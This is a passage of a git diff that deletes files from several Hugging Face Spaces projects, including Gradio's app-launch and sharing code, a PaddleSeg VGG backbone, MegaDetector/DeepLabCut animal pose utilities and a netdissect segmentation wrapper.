- if not self.exited:
- self.__exit__()
-
- self.dev_mode = False
- if (
- auth
- and not callable(auth)
- and not isinstance(auth[0], tuple)
- and not isinstance(auth[0], list)
- ):
- self.auth = [auth]
- else:
- self.auth = auth
- self.auth_message = auth_message
- self.show_tips = show_tips
- self.show_error = show_error
- self.height = height
- self.width = width
- self.favicon_path = favicon_path
- self.ssl_verify = ssl_verify
- self.root_path = root_path
-
- if enable_queue is not None:
- self.enable_queue = enable_queue
- warn_deprecation(
- "The `enable_queue` parameter has been deprecated. "
- "Please use the `.queue()` method instead.",
- )
- if encrypt is not None:
- warn_deprecation(
- "The `encrypt` parameter has been deprecated and has no effect.",
- )
-
- if self.space_id:
- self.enable_queue = self.enable_queue is not False
- else:
- self.enable_queue = self.enable_queue is True
- if self.enable_queue and not hasattr(self, "_queue"):
- self.queue()
- self.show_api = self.api_open if self.enable_queue else show_api
-
- if file_directories is not None:
- warn_deprecation(
- "The `file_directories` parameter has been renamed to `allowed_paths`. "
- "Please use that instead.",
- )
- if allowed_paths is None:
- allowed_paths = file_directories
- self.allowed_paths = allowed_paths or []
- self.blocked_paths = blocked_paths or []
-
- if not isinstance(self.allowed_paths, list):
- raise ValueError("`allowed_paths` must be a list of directories.")
- if not isinstance(self.blocked_paths, list):
- raise ValueError("`blocked_paths` must be a list of directories.")
-
- self.validate_queue_settings()
-
- self.config = self.get_config_file()
- self.max_threads = max(
- self._queue.max_thread_count if self.enable_queue else 0, max_threads
- )
-
- if self.is_running:
- assert isinstance(
- self.local_url, str
- ), f"Invalid local_url: {self.local_url}"
- if not (quiet):
- print(
- "Rerunning server... use `close()` to stop if you need to change `launch()` parameters.\n----"
- )
- else:
- if wasm_utils.IS_WASM:
- server_name = "xxx"
- server_port = 99999
- local_url = ""
- server = None
-
- # In the Wasm environment, we only need the app object
- # which the frontend app will directly communicate with through the Worker API,
- # and we don't need to start a server.
- # So we just create the app object and register it here,
- # and avoid using `networking.start_server` that would start a server that don't work in the Wasm env.
- from gradio.routes import App
-
- app = App.create_app(self, app_kwargs=app_kwargs)
- wasm_utils.register_app(app)
- else:
- (
- server_name,
- server_port,
- local_url,
- app,
- server,
- ) = networking.start_server(
- self,
- server_name,
- server_port,
- ssl_keyfile,
- ssl_certfile,
- ssl_keyfile_password,
- app_kwargs=app_kwargs,
- )
- self.server_name = server_name
- self.local_url = local_url
- self.server_port = server_port
- self.server_app = app
- self.server = server
- self.is_running = True
- self.is_colab = utils.colab_check()
- self.is_kaggle = utils.kaggle_check()
-
- self.protocol = (
- "https"
- if self.local_url.startswith("https") or self.is_colab
- else "http"
- )
- if not self.is_colab:
- print(
- strings.en["RUNNING_LOCALLY_SEPARATED"].format(
- self.protocol, self.server_name, self.server_port
- )
- )
-
- if self.enable_queue:
- self._queue.set_url(self.local_url)
-
- # Cannot run async functions in background other than app's scope.
- # Workaround by triggering the app endpoint
- if not wasm_utils.IS_WASM:
- requests.get(f"{self.local_url}startup-events", verify=ssl_verify)
-
- if wasm_utils.IS_WASM:
- return TupleNoPrint((self.server_app, self.local_url, self.share_url))
-
- utils.launch_counter()
- self.is_sagemaker = utils.sagemaker_check()
- if share is None:
- if self.is_colab and self.enable_queue:
- if not quiet:
- print(
- "Setting queue=True in a Colab notebook requires sharing enabled. Setting `share=True` (you can turn this off by setting `share=False` in `launch()` explicitly).\n"
- )
- self.share = True
- elif self.is_kaggle:
- if not quiet:
- print(
- "Kaggle notebooks require sharing enabled. Setting `share=True` (you can turn this off by setting `share=False` in `launch()` explicitly).\n"
- )
- self.share = True
- elif self.is_sagemaker:
- if not quiet:
- print(
- "Sagemaker notebooks may require sharing enabled. Setting `share=True` (you can turn this off by setting `share=False` in `launch()` explicitly).\n"
- )
- self.share = True
- else:
- self.share = False
- else:
- self.share = share
-
- # If running in a colab or not able to access localhost,
- # a shareable link must be created.
- if _frontend and (not networking.url_ok(self.local_url)) and (not self.share):
- raise ValueError(
- "When localhost is not accessible, a shareable link must be created. Please set share=True or check your proxy settings to allow access to localhost."
- )
-
- if self.is_colab:
- if not quiet:
- if debug:
- print(strings.en["COLAB_DEBUG_TRUE"])
- else:
- print(strings.en["COLAB_DEBUG_FALSE"])
- if not self.share:
- print(strings.en["COLAB_WARNING"].format(self.server_port))
- if self.enable_queue and not self.share:
- raise ValueError(
- "When using queueing in Colab, a shareable link must be created. Please set share=True."
- )
-
- if self.share:
- if self.space_id:
- raise RuntimeError("Share is not supported when you are in Spaces")
- try:
- if self.share_url is None:
- self.share_url = networking.setup_tunnel(
- self.server_name, self.server_port, self.share_token
- )
- print(strings.en["SHARE_LINK_DISPLAY"].format(self.share_url))
- if not (quiet):
- print(strings.en["SHARE_LINK_MESSAGE"])
- except (RuntimeError, requests.exceptions.ConnectionError):
- if self.analytics_enabled:
- analytics.error_analytics("Not able to set up tunnel")
- self.share_url = None
- self.share = False
- if Path(BINARY_PATH).exists():
- print(strings.en["COULD_NOT_GET_SHARE_LINK"])
- else:
- print(
- strings.en["COULD_NOT_GET_SHARE_LINK_MISSING_FILE"].format(
- BINARY_PATH,
- BINARY_URL,
- BINARY_FILENAME,
- BINARY_FOLDER,
- )
- )
- else:
- if not (quiet):
- print(strings.en["PUBLIC_SHARE_TRUE"])
- self.share_url = None
-
- if inbrowser:
- link = self.share_url if self.share and self.share_url else self.local_url
- webbrowser.open(link)
-
- # Check if running in a Python notebook in which case, display inline
- if inline is None:
- inline = utils.ipython_check()
- if inline:
- try:
- from IPython.display import HTML, Javascript, display # type: ignore
-
- if self.share and self.share_url:
- while not networking.url_ok(self.share_url):
- time.sleep(0.25)
- display(
- HTML(
- f''
- )
- )
- elif self.is_colab:
- # modified from /usr/local/lib/python3.7/dist-packages/google/colab/output/_util.py within Colab environment
- code = """(async (port, path, width, height, cache, element) => {
- if (!google.colab.kernel.accessAllowed && !cache) {
- return;
- }
- element.appendChild(document.createTextNode(''));
- const url = await google.colab.kernel.proxyPort(port, {cache});
-
- const external_link = document.createElement('div');
- external_link.innerHTML = `
-
- `;
- element.appendChild(external_link);
-
- const iframe = document.createElement('iframe');
- iframe.src = new URL(path, url).toString();
- iframe.height = height;
- iframe.allow = "autoplay; camera; microphone; clipboard-read; clipboard-write;"
- iframe.width = width;
- iframe.style.border = 0;
- element.appendChild(iframe);
- })""" + "({port}, {path}, {width}, {height}, {cache}, window.element)".format(
- port=json.dumps(self.server_port),
- path=json.dumps("/"),
- width=json.dumps(self.width),
- height=json.dumps(self.height),
- cache=json.dumps(False),
- )
-
- display(Javascript(code))
- else:
- display(
- HTML(
- f''
- )
- )
- except ImportError:
- pass
-
- if getattr(self, "analytics_enabled", False):
- data = {
- "launch_method": "browser" if inbrowser else "inline",
- "is_google_colab": self.is_colab,
- "is_sharing_on": self.share,
- "share_url": self.share_url,
- "enable_queue": self.enable_queue,
- "show_tips": self.show_tips,
- "server_name": server_name,
- "server_port": server_port,
- "is_space": self.space_id is not None,
- "mode": self.mode,
- }
- analytics.launched_analytics(self, data)
-
- utils.show_tip(self)
-
- # Block main thread if debug==True
- if debug or int(os.getenv("GRADIO_DEBUG", 0)) == 1:
- self.block_thread()
- # Block main thread if running in a script to stop script from exiting
- is_in_interactive_mode = bool(getattr(sys, "ps1", sys.flags.interactive))
-
- if not prevent_thread_lock and not is_in_interactive_mode:
- self.block_thread()
-
- return TupleNoPrint((self.server_app, self.local_url, self.share_url))
-
- def integrate(
- self,
- comet_ml=None,
- wandb: ModuleType | None = None,
- mlflow: ModuleType | None = None,
- ) -> None:
- """
- A catch-all method for integrating with other libraries. This method should be run after launch()
- Parameters:
- comet_ml: If a comet_ml Experiment object is provided, will integrate with the experiment and appear on Comet dashboard
- wandb: If the wandb module is provided, will integrate with it and appear on WandB dashboard
- mlflow: If the mlflow module is provided, will integrate with the experiment and appear on ML Flow dashboard
- """
- analytics_integration = ""
- if comet_ml is not None:
- analytics_integration = "CometML"
- comet_ml.log_other("Created from", "Gradio")
- if self.share_url is not None:
- comet_ml.log_text(f"gradio: {self.share_url}")
- comet_ml.end()
- elif self.local_url:
- comet_ml.log_text(f"gradio: {self.local_url}")
- comet_ml.end()
- else:
- raise ValueError("Please run `launch()` first.")
- if wandb is not None:
- analytics_integration = "WandB"
- if self.share_url is not None:
- wandb.log(
- {
- "Gradio panel": wandb.Html(
- ''
- )
- }
- )
- else:
- print(
- "The WandB integration requires you to "
- "`launch(share=True)` first."
- )
- if mlflow is not None:
- analytics_integration = "MLFlow"
- if self.share_url is not None:
- mlflow.log_param("Gradio Interface Share Link", self.share_url)
- else:
- mlflow.log_param("Gradio Interface Local Link", self.local_url)
- if self.analytics_enabled and analytics_integration:
- data = {"integration": analytics_integration}
- analytics.integration_analytics(data)
-
- def close(self, verbose: bool = True) -> None:
- """
- Closes the Interface that was launched and frees the port.
- """
- try:
- if self.enable_queue:
- self._queue.close()
- if self.server:
- self.server.close()
- self.is_running = False
- # So that the startup events (starting the queue)
- # happen the next time the app is launched
- self.app.startup_events_triggered = False
- if verbose:
- print(f"Closing server running on port: {self.server_port}")
- except (AttributeError, OSError): # can't close if not running
- pass
-
- def block_thread(
- self,
- ) -> None:
- """Block main thread until interrupted by user."""
- try:
- while True:
- time.sleep(0.1)
- except (KeyboardInterrupt, OSError):
- print("Keyboard interruption in main thread... closing server.")
- if self.server:
- self.server.close()
- for tunnel in CURRENT_TUNNELS:
- tunnel.kill()
-
- def attach_load_events(self):
- """Add a load event for every component whose initial value should be randomized."""
- if Context.root_block:
- for component in Context.root_block.blocks.values():
- if (
- isinstance(component, components.IOComponent)
- and component.load_event_to_attach
- ):
- load_fn, every = component.load_event_to_attach
- # Use set_event_trigger to avoid ambiguity between load class/instance method
- dep = self.set_event_trigger(
- "load",
- load_fn,
- None,
- component,
- no_target=True,
- # If every is None, for sure skip the queue
- # else, let the enable_queue parameter take precedence
- # this will raise a nice error message is every is used
- # without queue
- queue=False if every is None else None,
- every=every,
- )[0]
- component.load_event = dep
-
- def startup_events(self):
- """Events that should be run when the app containing this block starts up."""
-
- if self.enable_queue:
- utils.run_coro_in_background(self._queue.start, self.ssl_verify)
- # So that processing can resume in case the queue was stopped
- self._queue.stopped = False
- utils.run_coro_in_background(self.create_limiter)
-
- def queue_enabled_for_fn(self, fn_index: int):
- if self.dependencies[fn_index]["queue"] is None:
- return self.enable_queue
- return self.dependencies[fn_index]["queue"]
diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/index-8f1feca1.css b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/index-8f1feca1.css
deleted file mode 100644
index 1b457869043e5e2005c2331cb14abed07b7f6a88..0000000000000000000000000000000000000000
--- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/index-8f1feca1.css
+++ /dev/null
@@ -1 +0,0 @@
-span.svelte-s1r2yt{font-weight:var(--section-header-text-weight);font-size:var(--section-header-text-size)}.label-wrap.svelte-s1r2yt{display:flex;justify-content:space-between;cursor:pointer;width:var(--size-full)}.label-wrap.open.svelte-s1r2yt{margin-bottom:var(--size-2)}.icon.svelte-s1r2yt{transition:.15s}
diff --git a/spaces/DaFujaTyping/hf-Chat-ui/src/lib/utils/trimPrefix.ts b/spaces/DaFujaTyping/hf-Chat-ui/src/lib/utils/trimPrefix.ts
deleted file mode 100644
index d006e66deca639f3f4d208e77a64ba368fab00ee..0000000000000000000000000000000000000000
--- a/spaces/DaFujaTyping/hf-Chat-ui/src/lib/utils/trimPrefix.ts
+++ /dev/null
@@ -1,6 +0,0 @@
-export function trimPrefix(input: string, prefix: string) {
- if (input.startsWith(prefix)) {
- return input.slice(prefix.length);
- }
- return input;
-}
diff --git a/spaces/DeepDrivePL/PaddleSeg-Matting/matting/model/vgg.py b/spaces/DeepDrivePL/PaddleSeg-Matting/matting/model/vgg.py
deleted file mode 100644
index 64b529bf0c3e25cb82ea4b4c31bec9ef30d2da59..0000000000000000000000000000000000000000
--- a/spaces/DeepDrivePL/PaddleSeg-Matting/matting/model/vgg.py
+++ /dev/null
@@ -1,166 +0,0 @@
-# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-import paddle
-from paddle import ParamAttr
-import paddle.nn as nn
-import paddle.nn.functional as F
-from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
-from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
-
-from paddleseg.cvlibs import manager
-from paddleseg.utils import utils
-
-
-class ConvBlock(nn.Layer):
- def __init__(self, input_channels, output_channels, groups, name=None):
- super(ConvBlock, self).__init__()
-
- self.groups = groups
- self._conv_1 = Conv2D(
- in_channels=input_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "1_weights"),
- bias_attr=False)
- if groups == 2 or groups == 3 or groups == 4:
- self._conv_2 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "2_weights"),
- bias_attr=False)
- if groups == 3 or groups == 4:
- self._conv_3 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "3_weights"),
- bias_attr=False)
- if groups == 4:
- self._conv_4 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "4_weights"),
- bias_attr=False)
-
- self._pool = MaxPool2D(
- kernel_size=2, stride=2, padding=0, return_mask=True)
-
- def forward(self, inputs):
- x = self._conv_1(inputs)
- x = F.relu(x)
- if self.groups == 2 or self.groups == 3 or self.groups == 4:
- x = self._conv_2(x)
- x = F.relu(x)
- if self.groups == 3 or self.groups == 4:
- x = self._conv_3(x)
- x = F.relu(x)
- if self.groups == 4:
- x = self._conv_4(x)
- x = F.relu(x)
- skip = x
- x, max_indices = self._pool(x)
- return x, max_indices, skip
-
-
-class VGGNet(nn.Layer):
- def __init__(self, input_channels=3, layers=11, pretrained=None):
- super(VGGNet, self).__init__()
- self.pretrained = pretrained
-
- self.layers = layers
- self.vgg_configure = {
- 11: [1, 1, 2, 2, 2],
- 13: [2, 2, 2, 2, 2],
- 16: [2, 2, 3, 3, 3],
- 19: [2, 2, 4, 4, 4]
- }
- assert self.layers in self.vgg_configure.keys(), \
- "supported layers are {} but input layer is {}".format(
- self.vgg_configure.keys(), layers)
- self.groups = self.vgg_configure[self.layers]
-
- # matting的第一层卷积输入为4通道,初始化是直接初始化为0
- self._conv_block_1 = ConvBlock(
- input_channels, 64, self.groups[0], name="conv1_")
- self._conv_block_2 = ConvBlock(64, 128, self.groups[1], name="conv2_")
- self._conv_block_3 = ConvBlock(128, 256, self.groups[2], name="conv3_")
- self._conv_block_4 = ConvBlock(256, 512, self.groups[3], name="conv4_")
- self._conv_block_5 = ConvBlock(512, 512, self.groups[4], name="conv5_")
-
- # 这一层的初始化需要利用vgg fc6的参数转换后进行初始化,可以暂时不考虑初始化
- self._conv_6 = Conv2D(
- 512, 512, kernel_size=3, padding=1, bias_attr=False)
-
- self.init_weight()
-
- def forward(self, inputs):
- fea_list = []
- ids_list = []
- x, ids, skip = self._conv_block_1(inputs)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_2(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_3(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_4(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_5(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x = F.relu(self._conv_6(x))
- fea_list.append(x)
- return fea_list
-
- def init_weight(self):
- if self.pretrained is not None:
- utils.load_pretrained_model(self, self.pretrained)
-
-
-@manager.BACKBONES.add_component
-def VGG11(**args):
- model = VGGNet(layers=11, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG13(**args):
- model = VGGNet(layers=13, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG16(**args):
- model = VGGNet(layers=16, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG19(**args):
- model = VGGNet(layers=19, **args)
- return model
diff --git a/spaces/DeepLabCut/MegaDetector_DeepLabCut/detection_utils.py b/spaces/DeepLabCut/MegaDetector_DeepLabCut/detection_utils.py
deleted file mode 100644
index ff53cdbbe7cb640dde9cbcb8eee38d48c1d4ae8e..0000000000000000000000000000000000000000
--- a/spaces/DeepLabCut/MegaDetector_DeepLabCut/detection_utils.py
+++ /dev/null
@@ -1,116 +0,0 @@
-
-from tkinter import W
-import gradio as gr
-from matplotlib import cm
-import torch
-import torchvision
-from dlclive import DLCLive, Processor
-import matplotlib
-from PIL import Image, ImageColor, ImageFont, ImageDraw
-import numpy as np
-import math
-
-
-import yaml
-import pdb
-
-############################################
-# Predict detections with MegaDetector v5a model
-def predict_md(im,
- megadetector_model, #Megadet_Models[mega_model_input]
- size=640):
-
- # resize image
- g = (size / max(im.size)) # multipl factor to make max size of the image equal to input size
- im = im.resize((int(x * g) for x in im.size),
- Image.ANTIALIAS) # resize
- # device
- if torch.cuda.is_available():
- md_device = torch.device('cuda')
- else:
- md_device = torch.device('cpu')
-
- # megadetector
- MD_model = torch.hub.load('ultralytics/yolov5', # repo_or_dir
- 'custom', #model
- megadetector_model, # args for callable model
- force_reload=True,
- device=md_device)
-
- # send model to gpu if possible
- if (md_device == torch.device('cuda')):
- print('Sending model to GPU')
- MD_model.to(md_device)
-
- ## detect objects
- results = MD_model(im) # inference # vars(results).keys()= dict_keys(['imgs', 'pred', 'names', 'files', 'times', 'xyxy', 'xywh', 'xyxyn', 'xywhn', 'n', 't', 's'])
-
- return results
-
-
-##########################################
-def crop_animal_detections(img_in,
- yolo_results,
- likelihood_th):
-
- ## Extract animal crops
- list_labels_as_str = [i for i in yolo_results.names.values()] # ['animal', 'person', 'vehicle']
- list_np_animal_crops = []
-
- # image to crop (scale as input for megadetector)
- img_in = img_in.resize((yolo_results.ims[0].shape[1],
- yolo_results.ims[0].shape[0]))
- # for every detection in the img
- for det_array in yolo_results.xyxy:
-
- # for every detection
- for j in range(det_array.shape[0]):
-
- # compute coords around bbox rounded to the nearest integer (for pasting later)
- xmin_rd = int(math.floor(det_array[j,0])) # int() should suffice?
- ymin_rd = int(math.floor(det_array[j,1]))
-
- xmax_rd = int(math.ceil(det_array[j,2]))
- ymax_rd = int(math.ceil(det_array[j,3]))
-
- pred_llk = det_array[j,4]
- pred_label = det_array[j,5]
- # keep animal crops above threshold
- if (pred_label == list_labels_as_str.index('animal')) and \
- (pred_llk >= likelihood_th):
- area = (xmin_rd, ymin_rd, xmax_rd, ymax_rd)
-
- #pdb.set_trace()
- crop = img_in.crop(area) #Image.fromarray(img_in).crop(area)
- crop_np = np.asarray(crop)
-
- # add to list
- list_np_animal_crops.append(crop_np)
-
- return list_np_animal_crops
-
-##########################################
-def predict_dlc(list_np_crops,
- kpts_likelihood_th,
- DLCmodel,
- dlc_proc):
-
- # run dlc thru list of crops
- dlc_live = DLCLive(DLCmodel, processor=dlc_proc)
- dlc_live.init_inference(list_np_crops[0])
-
- list_kpts_per_crop = []
- all_kypts = []
- np_aux = np.empty((1,3)) # can I avoid hardcoding here?
- for crop in list_np_crops:
- # scale crop here?
- keypts_xyp = dlc_live.get_pose(crop) # third column is llk!
- # set kpts below threhsold to nan
-
- #pdb.set_trace()
- keypts_xyp[keypts_xyp[:,-1] < kpts_likelihood_th,:] = np_aux.fill(np.nan)
- # add kpts of this crop to list
- list_kpts_per_crop.append(keypts_xyp)
- all_kypts.append(keypts_xyp)
-
- return list_kpts_per_crop
\ No newline at end of file
diff --git a/spaces/DeepLabCut/MegaDetector_DeepLabCut/save_results.py b/spaces/DeepLabCut/MegaDetector_DeepLabCut/save_results.py
deleted file mode 100644
index bb4b28fd4622792b164a724f6300484896fae8e9..0000000000000000000000000000000000000000
--- a/spaces/DeepLabCut/MegaDetector_DeepLabCut/save_results.py
+++ /dev/null
@@ -1,56 +0,0 @@
-import json
-import numpy as np
-import pdb
-
-dict_pred = {0: 'animal', 1: 'person', 2: 'vehicle'}
-
-
-def save_results(md_results, dlc_outputs,map_label_id_to_str,thr,output_file = 'dowload_predictions.json'):
-
- """
-
- write json
-
- """
- info = {}
- ## info megaDetector
- info['file']= md_results.files[0]
- number_bb = len(md_results.xyxy[0].tolist())
- info['number_of_bb'] = number_bb
- number_bb_thr = len(dlc_outputs)
- labels = [n for n in map_label_id_to_str.values()]
- #pdb.set_trace()
- new_index = []
- for i in range(number_bb):
- corner_x1,corner_y1,corner_x2,corner_y2,confidence, _ = md_results.xyxy[0].tolist()[i]
-
- if confidence > thr:
- new_index.append(i)
-
-
- for i in range(number_bb_thr):
- aux={}
- corner_x1,corner_y1,corner_x2,corner_y2,confidence, _ = md_results.xyxy[0].tolist()[new_index[i]]
- aux['corner_1'] = (corner_x1,corner_y1)
- aux['corner_2'] = (corner_x2,corner_y2)
- aux['predict MD'] = md_results.names[0]
- aux['confidence MD'] = confidence
-
- ## info dlc
- kypts = []
- for s in dlc_outputs[i]:
- aux1 = []
- for j in s:
- aux1.append(float(j))
-
- kypts.append(aux1)
- aux['dlc_pred'] = dict(zip(labels,kypts))
- info['bb_' + str(new_index[i]) ]=aux
-
-
- with open(output_file, 'w') as f:
- json.dump(info, f, indent=1)
- print('Output file saved at {}'.format(output_file))
-
- return output_file
-
diff --git a/spaces/Dinoking/Guccio-AI-Designer/netdissect/segmenter.py b/spaces/Dinoking/Guccio-AI-Designer/netdissect/segmenter.py
deleted file mode 100644
index e5ebe364bc30f32581f0d560e11f08bfbd0d1731..0000000000000000000000000000000000000000
--- a/spaces/Dinoking/Guccio-AI-Designer/netdissect/segmenter.py
+++ /dev/null
@@ -1,581 +0,0 @@
-# Usage as a simple differentiable segmenter base class
-
-import os, torch, numpy, json, glob
-import skimage.morphology
-from collections import OrderedDict
-from netdissect import upsegmodel
-from netdissect import segmodel as segmodel_module
-from netdissect.easydict import EasyDict
-from urllib.request import urlretrieve
-
-class BaseSegmenter:
- def get_label_and_category_names(self):
- '''
- Returns two lists: first, a list of tuples [(label, category), ...]
- where the label and category are human-readable strings indicating
- the meaning of a segmentation class. The 0th segmentation class
- should be reserved for a label ('-') that means "no prediction."
- The second list should just be a list of [category,...] listing
- all categories in a canonical order.
- '''
- raise NotImplemented()
-
- def segment_batch(self, tensor_images, downsample=1):
- '''
- Returns a multilabel segmentation for the given batch of (RGB [-1...1])
- images. Each pixel of the result is a torch.long indicating a
- predicted class number. Multiple classes can be predicted for
- the same pixel: output shape is (n, multipred, y, x), where
- multipred is 3, 5, or 6, for how many different predicted labels can
- be given for each pixel (depending on whether subdivision is being
- used). If downsample is specified, then the output y and x dimensions
- are downsampled from the original image.
- '''
- raise NotImplemented()
-
- def predict_single_class(self, tensor_images, classnum, downsample=1):
- '''
- Given a batch of images (RGB, normalized to [-1...1]) and
- a specific segmentation class number, returns a tuple with
- (1) a differentiable ([0..1]) prediction score for the class
- at every pixel of the input image.
- (2) a binary mask showing where in the input image the
- specified class is the best-predicted label for the pixel.
- Does not work on subdivided labels.
- '''
- raise NotImplemented()
-
-class UnifiedParsingSegmenter(BaseSegmenter):
- '''
- This is a wrapper for a more complicated multi-class segmenter,
- as described in https://arxiv.org/pdf/1807.10221.pdf, and as
- released in https://github.com/CSAILVision/unifiedparsing.
- For our purposes and to simplify processing, we do not use
- whole-scene predictions, and we only consume part segmentations
- for the three largest object classes (sky, building, person).
- '''
-
- def __init__(self, segsizes=None, segdiv=None):
- # Create a segmentation model
- if segsizes is None:
- segsizes = [256]
- if segdiv == None:
- segdiv = 'undivided'
- segvocab = 'upp'
- segarch = ('resnet50', 'upernet')
- epoch = 40
- segmodel = load_unified_parsing_segmentation_model(
- segarch, segvocab, epoch)
- segmodel.cuda()
- self.segmodel = segmodel
- self.segsizes = segsizes
- self.segdiv = segdiv
- mult = 1
- if self.segdiv == 'quad':
- mult = 5
- self.divmult = mult
- # Assign class numbers for parts.
- first_partnumber = (
- (len(segmodel.labeldata['object']) - 1) * mult + 1 +
- (len(segmodel.labeldata['material']) - 1))
- # We only use parts for these three types of objects, for efficiency.
- partobjects = ['sky', 'building', 'person']
- partnumbers = {}
- partnames = []
- objectnumbers = {k: v
- for v, k in enumerate(segmodel.labeldata['object'])}
- part_index_translation = []
- # We merge some classes. For example "door" is both an object
- # and a part of a building. To avoid confusion, we just count
- # such classes as objects, and add part scores to the same index.
- for owner in partobjects:
- part_list = segmodel.labeldata['object_part'][owner]
- numeric_part_list = []
- for part in part_list:
- if part in objectnumbers:
- numeric_part_list.append(objectnumbers[part])
- elif part in partnumbers:
- numeric_part_list.append(partnumbers[part])
- else:
- partnumbers[part] = len(partnames) + first_partnumber
- partnames.append(part)
- numeric_part_list.append(partnumbers[part])
- part_index_translation.append(torch.tensor(numeric_part_list))
- self.objects_with_parts = [objectnumbers[obj] for obj in partobjects]
- self.part_index = part_index_translation
- self.part_names = partnames
- # For now we'll just do object and material labels.
- self.num_classes = 1 + (
- len(segmodel.labeldata['object']) - 1) * mult + (
- len(segmodel.labeldata['material']) - 1) + len(partnames)
- self.num_object_classes = len(self.segmodel.labeldata['object']) - 1
-
- def get_label_and_category_names(self, dataset=None):
- '''
- Lists label and category names.
- '''
- # Labels are ordered as follows:
- # 0, [object labels] [divided object labels] [materials] [parts]
- # The zero label is reserved to mean 'no prediction'.
- if self.segdiv == 'quad':
- suffixes = ['t', 'l', 'b', 'r']
- else:
- suffixes = []
- divided_labels = []
- for suffix in suffixes:
- divided_labels.extend([('%s-%s' % (label, suffix), 'part')
- for label in self.segmodel.labeldata['object'][1:]])
- # Create the whole list of labels
- labelcats = (
- [(label, 'object')
- for label in self.segmodel.labeldata['object']] +
- divided_labels +
- [(label, 'material')
- for label in self.segmodel.labeldata['material'][1:]] +
- [(label, 'part') for label in self.part_names])
- return labelcats, ['object', 'part', 'material']
-
- def raw_seg_prediction(self, tensor_images, downsample=1):
- '''
- Generates a segmentation by applying multiresolution voting on
- the segmentation model, using (rounded to 32 pixels) a set of
- resolutions in the example benchmark code.
- '''
- y, x = tensor_images.shape[2:]
- b = len(tensor_images)
- tensor_images = (tensor_images + 1) / 2 * 255
- tensor_images = torch.flip(tensor_images, (1,)) # BGR!!!?
- tensor_images -= torch.tensor([102.9801, 115.9465, 122.7717]).to(
- dtype=tensor_images.dtype, device=tensor_images.device
- )[None,:,None,None]
- seg_shape = (y // downsample, x // downsample)
- # We want these to be multiples of 32 for the model.
- sizes = [(s, s) for s in self.segsizes]
- pred = {category: torch.zeros(
- len(tensor_images), len(self.segmodel.labeldata[category]),
- seg_shape[0], seg_shape[1]).cuda()
- for category in ['object', 'material']}
- part_pred = {partobj_index: torch.zeros(
- len(tensor_images), len(partindex),
- seg_shape[0], seg_shape[1]).cuda()
- for partobj_index, partindex in enumerate(self.part_index)}
- for size in sizes:
- if size == tensor_images.shape[2:]:
- resized = tensor_images
- else:
- resized = torch.nn.AdaptiveAvgPool2d(size)(tensor_images)
- r_pred = self.segmodel(
- dict(img=resized), seg_size=seg_shape)
- for k in pred:
- pred[k] += r_pred[k]
- for k in part_pred:
- part_pred[k] += r_pred['part'][k]
- return pred, part_pred
-
- def segment_batch(self, tensor_images, downsample=1):
- '''
- Returns a multilabel segmentation for the given batch of (RGB [-1...1])
- images. Each pixel of the result is a torch.long indicating a
- predicted class number. Multiple classes can be predicted for
- the same pixel: output shape is (n, multipred, y, x), where
- multipred is 3, 5, or 6, for how many different predicted labels can
- be given for each pixel (depending on whether subdivision is being
- used). If downsample is specified, then the output y and x dimensions
- are downsampled from the original image.
- '''
- pred, part_pred = self.raw_seg_prediction(tensor_images,
- downsample=downsample)
- piece_channels = 2 if self.segdiv == 'quad' else 0
- y, x = tensor_images.shape[2:]
- seg_shape = (y // downsample, x // downsample)
- segs = torch.zeros(len(tensor_images), 3 + piece_channels,
- seg_shape[0], seg_shape[1],
- dtype=torch.long, device=tensor_images.device)
- _, segs[:,0] = torch.max(pred['object'], dim=1)
- # Get materials and translate to shared numbering scheme
- _, segs[:,1] = torch.max(pred['material'], dim=1)
- maskout = (segs[:,1] == 0)
- segs[:,1] += (len(self.segmodel.labeldata['object']) - 1) * self.divmult
- segs[:,1][maskout] = 0
- # Now deal with subparts of sky, buildings, people
- for i, object_index in enumerate(self.objects_with_parts):
- trans = self.part_index[i].to(segs.device)
- # Get the argmax, and then translate to shared numbering scheme
- seg = trans[torch.max(part_pred[i], dim=1)[1]]
- # Only trust the parts where the prediction also predicts the
- # owning object.
- mask = (segs[:,0] == object_index)
- segs[:,2][mask] = seg[mask]
-
- if self.segdiv == 'quad':
- segs = self.expand_segment_quad(segs, self.segdiv)
- return segs
-
- def predict_single_class(self, tensor_images, classnum, downsample=1):
- '''
- Given a batch of images (RGB, normalized to [-1...1]) and
- a specific segmentation class number, returns a tuple with
- (1) a differentiable ([0..1]) prediction score for the class
- at every pixel of the input image.
- (2) a binary mask showing where in the input image the
- specified class is the best-predicted label for the pixel.
- Does not work on subdivided labels.
- '''
- result = 0
- pred, part_pred = self.raw_seg_prediction(tensor_images,
- downsample=downsample)
